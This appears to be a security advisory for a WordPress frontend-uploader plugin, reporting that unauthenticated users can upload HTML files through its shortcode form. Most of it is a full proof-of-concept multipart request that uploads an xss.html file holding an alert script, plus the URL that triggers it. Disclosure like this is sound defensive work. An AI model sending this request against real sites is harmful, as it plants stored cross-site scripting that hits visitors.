The plugin does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly
In a page/posts where the [fu-upload-form] shortcode is embed, simply upload an HTML file via the generated form POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------124662954015823207281179831654 Content-Length: 1396 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="post_ID" 1247 -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="post_title" test -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="post_content" test -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="files[]"; filename="xss.html" Content-Type: text/html <script>alert(/XSS/)</script> -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="action" upload_ugc -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="form_layout" image -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="fu_nonce" 021fb612f9 -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="_wp_http_referer" /wordpress/frontend-uploader-form/ -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="ff" 92b6cbfa6120e13ff1654e28cef2a271 -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="form_post_id" 1247 -----------------------------124662954015823207281179831654-- Then access the uploaded to trigger the XSS, ie https://example.com/wp-content/uploads/2021/07/xss.html
YouTube Video
Veshraj Ghimire
Vess Razz
Yes
2021-09-21 (about 1 years ago)
2021-09-21 (about 1 years ago)
2022-04-09 (about 1 years ago)